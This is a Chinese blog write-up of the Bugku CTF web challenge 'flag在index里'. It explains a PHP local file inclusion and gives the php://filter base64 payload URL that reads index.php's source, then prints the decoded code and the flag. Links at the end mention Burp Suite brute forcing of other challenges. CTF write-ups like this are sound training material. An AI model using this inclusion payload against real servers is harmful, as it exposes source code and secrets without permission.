bugku-web-flag在index里
Bugku web
发布日期:   2019-11-02
阅读次数:  

flag在index里

img

该题是经典的文件包含漏洞+PHP伪协议的结合

打开链接,发现点击click me?no还有一个PHP文件

img

因为看不到PHP文件里的内容,所以可以用PHP伪协议的封装协议php://filter

img

php://filter

利用它可以读取服务器中的文件

由于读取文件的数据直接输出在了页面上,如果读取的是php文件的话,PHP代码在浏览器中,解析会不正常,那么我们可以用这个协议将php文件中的代码以base64的形式输出在页面上: Payload:

http://xxx.xxx.xxx.xxx/test/file.php?filename=php://filter/read=convert.base64-encode/resource=file.php

在url中输入view-source:http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

img

得到一长段代码,对代码进行base64解码得到下面一个html

Bugku-ctf click me? no';} $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!"; exit(); } include($file); //flag:flag{edulcni_elif_lacol_si_siht} ?>

得到flag{edulcni_elif_lacol_si_siht}

 上一篇
bugku-web-请输入密码 bugku-web-请输入密码
请输入密码 打开链接,页面显示输入五位数的密码,我们可以用Burpsuite pro来爆破 在文本框里随便输入5位数字,进行抓包 把抓到的包点击Action,选择send to Intruder打开 点击Positions,先清除b
2019-11-02 清风
Bugku web
下一篇 
bugku-web-你必须让他停下来 bugku-web-你必须让他停下来
你必须让他停下来 打开链接,发现图片一直在跳,我们可以尝试抓包,抓包发现有十几张图片,多尝试几次,最后在10.jpg中发现了flag{dummy_game_1s_s0_popular}
2019-11-02 清风
Bugku web
  目录